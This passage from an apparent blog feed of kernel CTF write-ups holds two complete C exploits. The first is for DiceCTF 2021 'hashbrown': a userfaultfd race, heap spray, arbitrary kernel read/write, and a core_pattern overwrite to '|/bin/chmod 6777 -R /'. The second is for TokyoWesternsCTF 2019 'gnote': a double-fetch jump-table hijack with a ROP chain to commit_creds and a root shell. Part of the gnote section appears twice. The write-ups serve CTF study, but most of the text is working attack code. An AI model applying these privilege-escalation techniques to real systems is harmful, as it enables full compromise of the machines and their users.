class="collapsable-code__language">c</span> <span class="collapsable-code__title">DiceCTF2021-hashbrown-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static int register_uffd(void* addr, size_t len, void* (*handler)(void*)); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } #define VULN_DEV_NAME &#34;hashbrown&#34; #define VULN_DEV_CMD_ADD_KEY 0x1337 #define VULN_DEV_CMD_DELETE_KEY 0x1338 #define VULN_DEV_CMD_UPDATE_VALUE 0x1339 #define VULN_DEV_CMD_DELETE_VALUE 0x133a #define VULN_DEV_CMD_GET_VALUE 0x133b #define VULN_DEV_CONST_SIZE_ARR_START 0x10 #define VULN_DEV_CONST_SIZE_ARR_MAX 0x200 #define VULN_DEV_CONST_MAX_ENTRIES 0x400 #define VULN_DEV_CONST_MAX_VALUE_SIZE 0xb0 #define VULN_DEV_GET_THRESHOLD(size) (size - (size &gt;&gt; 2)) #define VULN_DEV_RESULT_INVALID 1 #define VULN_DEV_RESULT_EXISTS 2 #define VULN_DEV_RESULT_NOT_EXISTS 3 #define VULN_DEV_RESULT_MAXED 4 typedef struct { uint32_t key; uint32_t size; char* src; char* dest; } request_t; static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size); static int vuln_dev_delete_key(uint32_t key); static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size); static int vuln_dev_delete_value(uint32_t key); static int vuln_dev_get_value(uint32_t key, void* out, uint32_t size); static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size); static void calculate_hash_collision(uint32_t* out, size_t out_size, uint32_t hash, uint32_t size); int vuln_fd = 0; static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size) { request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_ADD_KEY, &amp;req); } static int vuln_dev_delete_key(uint32_t key) { request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_KEY, &amp;req); } static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size) { request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_UPDATE_VALUE, &amp;req); } static int vuln_dev_delete_value(uint32_t key) { request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_VALUE, &amp;req); } static int vuln_dev_get_value(uint32_t key, void* dest, uint32_t size) { request_t req = {.key = key, .size = size, .src = NULL, .dest = (char*)dest}; return ioctl(vuln_fd, VULN_DEV_CMD_GET_VALUE, &amp;req); } static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static void calculate_hash_collision(uint32_t* out, size_t out_size, uint32_t hash, uint32_t size) { if (hash &gt;= size) { fatal(&#34;calculate_hash_collision: hash &gt;= size&#34;); } uint32_t* p = out; const uint32_t* const last_p = p + out_size; for (uint32_t cur_key = 0; cur_key &lt;= 0xffffffff; ++cur_key) { const uint32_t cur_hash = get_hash_idx_from_key(cur_key, size); if (cur_hash != hash) { continue; } *p++ = cur_key; if (p == last_p) { break; } } } #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define IS_IN_KERNEL_BASE_RANGE(x) \ (KERNEL_BASE_START &lt;= (x) &amp;&amp; (x) &lt;= KERNEL_BASE_END) #define KERNEL_MODULE_START 0xffffffffc0000000 #define KERNEL_MODPROBE_OFFSET (0xa46fe0) #define KERNEL_CORE_PATTERN_OFFSET (0xb0cd00) #define KERNEL_START_SYMTAB_OFFSET (0x990940) #define KERNEL_MODULE_HASHMAP_OFFSET (0x2540) static void entry_spray(uint32_t idx, void* data, size_t size); static void* pthread_entry_spray(void* arg); static uint64_t construct_corrupted_entry(); static uint64_t leak_heap_address(); static void aar(void* out, uint64_t addr, size_t size); static void aaw(uint64_t addr, void* data, size_t size); static uint64_t aar64(uint64_t addr); static void aaw64(uint64_t addr, uint64_t val); static uint64_t find_kernel_address(uint64_t heap_addr); static uint64_t find_module_base(); static uint64_t find_core_pattern_address(uint64_t kernel_addr); static void entry_spray(uint32_t idx, void* data, size_t size) { uint32_t keys[512]; calculate_hash_collision(keys, 512, idx, VULN_DEV_CONST_SIZE_ARR_MAX); for (int i = 0; i &lt; 512; ++i) { vuln_dev_add_key(keys[i], data, size); } } static void* pthread_entry_spray(void* arg) { uint32_t idx = *(uint32_t*)(arg); void* data = (void*)*(uint64_t*)(arg + 8); size_t size = *(size_t*)(arg + 16); uint32_t keys[512]; entry_spray(idx, data, size); } cpu_set_t target_cpu; uint32_t collision_keys[VULN_DEV_CONST_SIZE_ARR_MAX]; static void* userfault_handler_for_construct_fake_entry(void* args) { int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_construct_fake_entry: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; // puts( // &#34;[*] userfault_handler_for_construct_fake_entry: waiting for page &#34; // &#34;fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_construct_fake_entry: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_construct_fake_entry: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_construct_fake_entry: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } // printf( // &#34;[*] userfault_handler_for_construct_fake_entry: addr=0x%llx, &#34; // &#34;flag=0x%llx\n&#34;, // msg.arg.pagefault.address, msg.arg.pagefault.flags); // Main Routine puts(&#34;[+] UFFD: Deleting values...&#34;); uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2; uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size); for (int i = 0; i &lt;= cur_threshold + 1; ++i) { vuln_dev_delete_value(collision_keys[i]); } copy.src = (uint64_t)page; // data of page will be data of faulted page copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler_for_construct_fake_entry: ioctl(UFFDIO_COPY)&#34;); } break; } munmap(page, 0x1000); return NULL; } static uint64_t construct_corrupted_entry() { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; memset(data, &#39;a&#39;, 0x20); uint32_t target_idx = 0; uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2; uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size); calculate_hash_collision(collision_keys, 512, target_idx, VULN_DEV_CONST_SIZE_ARR_MAX); puts(&#34;[*] Adding keys...&#34;); for (int i = 0; i &lt; cur_threshold; ++i) { vuln_dev_add_key(collision_keys[i], data, sizeof(data)); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); int uffd = register_uffd(uffd_page, 0x1000, userfault_handler_for_construct_fake_entry); puts(&#34;[*] Trigger `resize` and deleting values...&#34;); vuln_dev_add_key(collision_keys[cur_threshold + 1], uffd_page, sizeof(data)); puts(&#34;[*] Spraying entries...&#34;); { entry_spray(1, data, 0x20); pthread_t th; uint64_t arg[3] = {2, (uint64_t)data, 0x20}; pthread_create(&amp;th, NULL, pthread_entry_spray, arg); pthread_join(th, NULL); } puts(&#34;[*] Checking there is a corrupted entry...&#34;); uint64_t entry_key = -1, backing_key = -1; for (int i = 0; i &lt;= cur_threshold + 1; ++i) { uint32_t cur_key = collision_keys[i]; vuln_dev_get_value(collision_keys[i], data, 0x20); if (*uint64_data == 0x6161616161616161 || (*uint64_data &gt;&gt; 32) != 0x20) { continue; } entry_key = cur_key; backing_key = (*uint64_data) &amp; 0xffffffff; break; } close(uffd); munmap(uffd_page, 0x1000); return (entry_key &lt;&lt; 32) | backing_key; } uint32_t controller_key, backing_key; uint64_t original_backing_ptr; static uint64_t leak_heap_address() { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; vuln_dev_get_value(controller_key, data, 0x20); return uint64_data[1]; } static void aar(void* dest, uint64_t addr, size_t size) { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; uint64_data[0] = ((size &amp; 0xffffffff) &lt;&lt; 32) | backing_key; uint64_data[1] = addr; vuln_dev_update_value(controller_key, data, 0x10); vuln_dev_get_value(backing_key, dest, size); } static void aaw(uint64_t addr, void* src, size_t size) { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; uint64_data[0] = ((size &amp; 0xffffffff) &lt;&lt; 32) | backing_key; uint64_data[1] = addr; vuln_dev_update_value(controller_key, data, 0x10); vuln_dev_update_value(backing_key, src, size); } static uint64_t aar64(uint64_t addr) { uint64_t val = -1; aar(&amp;val, addr, 8); return val; } static void aaw64(uint64_t addr, uint64_t val) { return aaw(addr, &amp;val, 8); } static uint64_t find_kernel_address(uint64_t heap_addr) { char data[0x1000]; uint64_t* uint64_data = (uint64_t*)data; int sprays[0x1000]; for (int i = 0; i &lt; 0x1000; ++i) { sprays[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } uint64_t addr = heap_addr - 0x8000; uint64_t ret = -1; while (addr &lt;= heap_addr + 0x8000) { uint64_t val = aar64(addr); if (IS_IN_KERNEL_BASE_RANGE(val)) { ret = val; break; } addr += 8; } for (int i = 0; i &lt; 0x1000; ++i) { close(sprays[i]); } return ret; } static uint64_t find_module_base() { uint64_t addr = KERNEL_MODULE_START; while (addr &lt;= KERNEL_MODULE_START + 0x10000 * 0x1000) { uint64_t val = aar64(addr); if (val != -1) { return addr; } addr += 0x1000; } } static uint64_t find_core_pattern_address(uint64_t kernel_addr) { char data[0x20]; uint64_t maybe_kernel_base = kernel_addr &amp; ~0xfffff; uint64_t maybe_core_pattern_addr = maybe_kernel_base + KERNEL_CORE_PATTERN_OFFSET; uint64_t core_pattern_addr = -1; while (core_pattern_addr == -1) { aar(data, maybe_core_pattern_addr, 0x20); if (!strcmp(data, &#34;core&#34;)) { core_pattern_addr = maybe_core_pattern_addr; } maybe_core_pattern_addr -= 0x100000; } return core_pattern_addr; } int main() { vuln_fd = open(&#34;/dev/&#34; VULN_DEV_NAME, O_RDONLY); if (vuln_fd &lt; 0) { fatal(&#34;open(/dev/&#34; VULN_DEV_NAME &#34;)&#34;); } uint64_t entry_key_and_backing_key = construct_corrupted_entry(); controller_key = entry_key_and_backing_key &gt;&gt; 32; backing_key = entry_key_and_backing_key &amp; 0xffffffff; original_backing_ptr = leak_heap_address(); printf( &#34;[+] Find corrupted entry! (controller_key=0x%08x, &#34; &#34;backing_key=0x%08x; backing_ptr=0x%016lx)\n&#34;, controller_key, backing_key, original_backing_ptr); uint64_t kernel_address = find_kernel_address(original_backing_ptr); printf(&#34;[+] kernel_address(not base): 0x%016lx\n&#34;, kernel_address); uint64_t module_base = find_module_base(); printf(&#34;[+] module_base: 0x%016lx\n&#34;, module_base); uint64_t core_pattern_address = find_core_pattern_address(kernel_address); printf(&#34;[+] core_pattern_address: 0x%016lx\n&#34;, core_pattern_address); uint64_t kernel_base = core_pattern_address - KERNEL_CORE_PATTERN_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); char new_core_pattern[] = &#34;|/bin/chmod 6777 -R /&#34;; printf(&#34;[*] Overwrite core_pattern to \&#34;%s\&#34;...\n&#34;, new_core_pattern); aaw(core_pattern_address, new_core_pattern, sizeof(new_core_pattern)); puts(&#34;[*] Trigger core_pattern...&#34;); uint64_t* evil = (uint64_t*)0xdeadbeefcafebebe; *evil = 0; return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/DiceCTF/2021/pwn/hashbrown">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/DiceCTF/2021/pwn/hashbrown</a></li> </ul> TokyoWesternsCTF2019 gnote /posts/kernel/write-ups/ctf/tokyowesternsctf2019-gnote/ Thu, 30 Jan 2025 14:39:40 +0000 /posts/kernel/write-ups/ctf/tokyowesternsctf2019-gnote/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <code>4.19.65</code></li> <li>mmap_min_addr: <code>0x1000</code></li> <li>No SMAP</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="738214659" type="checkbox" checked /> <label for="738214659"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-features.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int64_t gnote_write(struct file *a1, const request_t *req, size_t a3, loff_t *a4) { uint64_t len; note_data_t *req; void *new_note_data; mutex_lock(&amp;lock); switch (req-&gt;cmd) { case 1: if ((uint64_t)cnt &lt;= 7) { len = (uint32_t)req-&gt;arg; cur_note = &amp;notes[cnt]; cur_note-&gt;len = len; if (len &lt;= 0x10000) { new_note_data = kmalloc(len, 0x6000C0LL); ++cnt; cur_note-&gt;data = new_note_data; } } break; case 2: printk(&#34;Edit Not implemented\n&#34;); break; case 3: printk(&#34;Delete Not implemented\n&#34;); break; case 4: printk(&#34;Copy Not implemented\n&#34;); break; case 5: if ((uint32_t)req-&gt;arg &lt; (uint64_t)cnt) selected = (uint32_t)req-&gt;arg; break; default: break; } mutex_unlock(&amp;lock); return a3; } uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) { note_data_t *cur_note; mutex_lock(&amp;lock); if (selected == -1) { mutex_unlock(&amp;lock); return 0LL; } else { cur_note = &amp;notes[selected]; if (cur_note-&gt;len &lt;= len) len = cur_note-&gt;len; copy_to_user(a2, cur_note-&gt;data, len); selected = -1LL; mutex_unlock(&amp;lock); return len; } }</code></pre></div> <p>The gnote module has just 3 features: add new note, select note and get note&rsquo;s content. But with these features, we cannot write content to note (Edit is not implemented&hellip;).</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <code>4.19.65</code></li> <li>mmap_min_addr: <code>0x1000</code></li> <li>No SMAP</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="738214659" type="checkbox" checked /> <label for="738214659"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-features.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int64_t gnote_write(struct file *a1, const request_t *req, size_t a3, loff_t *a4) { uint64_t len; note_data_t *req; void *new_note_data; mutex_lock(&amp;lock); switch (req-&gt;cmd) { case 1: if ((uint64_t)cnt &lt;= 7) { len = (uint32_t)req-&gt;arg; cur_note = &amp;notes[cnt]; cur_note-&gt;len = len; if (len &lt;= 0x10000) { new_note_data = kmalloc(len, 0x6000C0LL); ++cnt; cur_note-&gt;data = new_note_data; } } break; case 2: printk(&#34;Edit Not implemented\n&#34;); break; case 3: printk(&#34;Delete Not implemented\n&#34;); break; case 4: printk(&#34;Copy Not implemented\n&#34;); break; case 5: if ((uint32_t)req-&gt;arg &lt; (uint64_t)cnt) selected = (uint32_t)req-&gt;arg; break; default: break; } mutex_unlock(&amp;lock); return a3; } uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) { note_data_t *cur_note; mutex_lock(&amp;lock); if (selected == -1) { mutex_unlock(&amp;lock); return 0LL; } else { cur_note = &amp;notes[selected]; if (cur_note-&gt;len &lt;= len) len = cur_note-&gt;len; copy_to_user(a2, cur_note-&gt;data, len); selected = -1LL; mutex_unlock(&amp;lock); return len; } }</code></pre></div> <p>The gnote module has just 3 features: add new note, select note and get note&rsquo;s content. But with these features, we cannot write content to note (Edit is not implemented&hellip;).</p> <h3 id="vulnerability">Vulnerability</h3> <p>There are two vulnerabilities. First is uninitialized heap and second is double fetch bug in switch statement.</p> <h4 id="uninitialized-heap">Uninitialized heap</h4> <p>When we add note, because the module just use <code>kmalloc</code> (note that <code>kmalloc</code> does not clear its data), we can get the previous content of allocated chunk. Therefore if the chunk was used to store vtable and the address of vtable is not cleared by SLUB or other object, we can get it.</p> <h4 id="double-fetch-in-switch-statement">Double fetch in switch statement</h4> <p>I think this is main bug of this challenge. As we know, sometimes switch statement use jump table for a speed (optimization). And the switch statement of <code>gnote_write</code> is implemented by jump table. But, its index (key) is obtained in user space:</p> <pre tabindex="0"><code class="language-assembly" data-lang="assembly">gnote_write: ; ... mov rbx, rsi; rsi is const request_t __user *buf mov r12, rdx call mutex_lock cmp dword ptr [rbx], 5 ; rbx is const request_t __user *buf ja short DEFAULT_CASE mov eax, [rbx] mov rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 &lt;= off &lt;= 0x3effff68 jmp __x86_indirect_thunk_rax ; ... </code></pre><p>The index (key) is double-fetched from user by <code>cmp dword ptr [rbx], 5</code> and <code>mov eax, [rbx]</code>. So if <code>[rbx]</code> is smaller or equal than 5 when executeing <code>cmp dword ptr [rbx], 5</code> and set <code>[rbx]</code> to other value before <code>mov eax, [rbx]</code>, we can use relatively arbitrary address like jump table.</p> <h2 id="exploit">Exploit</h2> <h3 id="leak-kernel-base">Leak kernel base</h3> <p>I explained above, we can leak kernel base using uninitialized heap chunk. For leaking kernel base, I use heap spray with &ldquo;/dev/ptmx&rdquo; (tty_struct) (see <code>leak_kernel_base</code> function).</p> <h3 id="exploit-switch__x86_indirect_thunk_rax-using-double-fetch">Exploit switch(__x86_indirect_thunk_rax) using double fetch</h3> <p>We can write a code which cause crash because of invalid jump table index (key) (see <code>jump_at_jump_table_idx</code>, <code>race1</code> and <code>race2</code>). However&hellip; there is not useful address in (ro)data segment of module&hellip;</p> <p>I could not find the way to exploit double fetch. So I just look the assembly instructions of switch statements:</p> <pre tabindex="0"><code class="language-assembly" data-lang="assembly">gnote_write: ; ... mov eax, [rbx] mov rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 &lt;= off &lt;= 0x3effff68 jmp __x86_indirect_thunk_rax ; ... </code></pre><p>Do you notice it? the target address of jump table is calulated by <code>key*8 - off</code> and <code>off</code> is changed depending on base address of module (<code>off = -(module_base + 0x1098)</code>). Let&rsquo;s consider <code>off</code> is 0x3fffef68 (this means <code>module_base</code> is 0xffffffffc0000000). In this assumption if <code>rax</code>, index (key) of jump table, is 0x7fffded, <code>key*8 - off</code> is 0!! So, we can access address 0 and use it as jump table!!</p> <p>In given environment, SMAP is disabled. Therefore we can use stack pivoting with mmaped page with <code>MAP_FIEXED | MAP_POPULATE</code>. Since mmap_min_addr is 0x1000 and the minimum key for non-negative result is 0x3fffef68, I think <code>0x200 + 0x7fffded</code> is best for a fixed key.</p> <h3 id="exploit-code">Exploit code</h3> <p>Because we cannot mmap with size = 0x1000000, I mmap with size = 0x400000. So, the success rate of this exploit code is 25%.</p> <div class="collapsable-code"> <input id="794152863" type="checkbox" checked /> <label for="794152863"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_WRITE_CMD_ADD 1 #define VULN_DEV_WRITE_CMD_SELECT 5 #define VULN_DEV_WRITE_CMD_MAX 6 #define VULN_DEV_MAX_NOTE_COUNT 8 #define VULN_DEV_RELATIVE_IDX_OF_NOTES_TO_JUMP_TABLE 0x26d #define FAKE_JUMP_TABLE_ADDR ((void*)0x1000) #define FAKE_JUMP_TABLE_SIZE 0x400000 #define FAKE_STACK_ADDR ((void*)0x5d000000) #define FAKE_STACK_SIZE 0x6000 #define FAKE_RSP (FAKE_STACK_ADDR + 5) #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define IS_KERNEL_BASE(x) \ ((KERNEL_BASE_START &lt;= (x)) &amp;&amp; ((x) &lt;= KERNEL_BASE_END)) #define TTY_STRUCT_OPS_OFFSET (0xffffffff81a35260 - KERNEL_BASE_START) #define MOV_ESP_0x5d000005_OFFSET (0xffffffff811f2bba - KERNEL_BASE_START) #define POP_RDI_OFFSET (0xffffffff8101c20d - KERNEL_BASE_START) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81069fe0 - KERNEL_BASE_START) #define POP_RCX_OFFSET (0xffffffff81037523 - KERNEL_BASE_START) #define MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET \ (0xffffffff81018eef - KERNEL_BASE_START) #define COMMIT_CREDS_OFFSET (0xffffffff81069df0 - KERNEL_BASE_START) #define BYPASS_KPTI_OFFSET (0xffffffff81600a4a - KERNEL_BASE_START) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int vuln_fd; int vuln_dev_added_count = 0; void vuln_dev_add(uint64_t size) { ++vuln_dev_added_count; request_t req = {.cmd = VULN_DEV_WRITE_CMD_ADD, .arg = size}; write(vuln_fd, &amp;req, sizeof(req)); } void vuln_dev_select(uint64_t idx) { request_t req = {.cmd = VULN_DEV_WRITE_CMD_SELECT, .arg = idx}; write(vuln_fd, &amp;req, sizeof(req)); } void* page_buf; request_t* page_req; cpu_set_t cpus[2]; uint64_t leak_kernel_base() { for (int cur_try = 0; cur_try &lt;= VULN_DEV_MAX_NOTE_COUNT; ++cur_try) { int spray_fds[0x10]; const int spray_obj_size = 0x2e0; const int spray_obj_count = sizeof(spray_fds) / sizeof(int); const int middle_idx = spray_obj_count / 2; for (int i = 0; i &lt; spray_obj_count; ++i) { spray_fds[i] = open(&#34;/dev/ptmx&#34;, O_NOCTTY | O_RDONLY); } for (int i = 0; i &lt; middle_idx; ++i) { close(spray_fds[i]); } vuln_dev_add(spray_obj_size); for (int i = middle_idx; i &lt; spray_obj_count; ++i) { close(spray_fds[i]); } vuln_dev_select(cur_try); read(vuln_fd, page_buf, spray_obj_size); uint64_t maybe_tty_struct_ops = *(uint64_t*)(page_buf + 0x18); uint64_t maybe_kbase = maybe_tty_struct_ops - TTY_STRUCT_OPS_OFFSET; if ((maybe_kbase &amp; 0xfffff) == 0 &amp;&amp; IS_KERNEL_BASE(maybe_kbase)) { return maybe_kbase; } } return (uint64_t)-1; } int do_race = 0; int jump_table_idx; void* race1(void* arg) { if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) { fatal(&#34;sched_setaffinity&#34;); } while (do_race) { page_req-&gt;cmd = VULN_DEV_WRITE_CMD_SELECT; } } void* race2(void* arg) { if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) { fatal(&#34;sched_setaffinity&#34;); } const uint64_t const_jump_table_idx = jump_table_idx; while (do_race) { page_req-&gt;cmd = const_jump_table_idx; } } void jump_at_jump_table_idx() { pthread_t th1; pthread_create(&amp;th1, NULL, race1, &amp;cpus[1]); pthread_t th2; pthread_create(&amp;th2, NULL, race2, &amp;cpus[1]); do_race = 1; page_req-&gt;arg = 0; while (1) { page_req-&gt;cmd = VULN_DEV_WRITE_CMD_SELECT; write(vuln_fd, page_buf, 0x1000); } } int main() { for (int i = 0; i &lt; 2; ++i) { CPU_ZERO(&amp;cpus[i]); CPU_SET(i, &amp;cpus[i]); } if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;cpus[0])) { fatal(&#34;sched_setaffinity&#34;); } save_state(); vuln_fd = open(&#34;/proc/gnote&#34;, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open(/proc/gnote)&#34;); } page_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page_buf == MAP_FAILED) { fatal(&#34;mmap&#34;); } page_req = (request_t*)page_buf; printf(&#34;[*] page_buf addr: %p\n&#34;, page_buf); uint64_t kernel_base = leak_kernel_base(); printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); void* fake_jump_table = mmap(FAKE_JUMP_TABLE_ADDR, FAKE_JUMP_TABLE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0); if (fake_jump_table == MAP_FAILED) { fatal(&#34;mmap&#34;); } for (uint64_t* cur = fake_jump_table; (void*)cur &lt; fake_jump_table + FAKE_JUMP_TABLE_SIZE; ++cur) { *cur = kernel_base + MOV_ESP_0x5d000005_OFFSET; } printf(&#34;[*] fake_jump_table addr: %p\n&#34;, fake_jump_table); void* fake_stack = mmap(FAKE_STACK_ADDR - FAKE_STACK_SIZE / 2, FAKE_STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0); if (fake_stack == MAP_FAILED) { fatal(&#34;mmap&#34;); } printf(&#34;[*] fake_stack addr: %p\n&#34;, fake_stack); printf(&#34;[*] Build ROP Chain @ %p...\n&#34;, fake_stack); uint64_t* rop_buf = FAKE_RSP; *rop_buf++ = kernel_base + POP_RDI_OFFSET; *rop_buf++ = 0; *rop_buf++ = kernel_base + PREPARE_KERNEL_CRED_OFFSET; *rop_buf++ = kernel_base + POP_RCX_OFFSET; *rop_buf++ = 0; *rop_buf++ = kernel_base + MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = kernel_base + COMMIT_CREDS_OFFSET; *rop_buf++ = kernel_base + BYPASS_KPTI_OFFSET; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = 0xdeadbeefcafebe02; *rop_buf++ = (uint64_t)(get_shell); // user_rip *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); jump_table_idx = 0x200 + 0x7fffded; printf(&#34;[*] jump_table_idx: 0x%08x\n&#34;, jump_table_idx); puts(&#34;[*] Do race condition attack at jump table used in switch...&#34;); jump_at_jump_table_idx(); close(vuln_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a 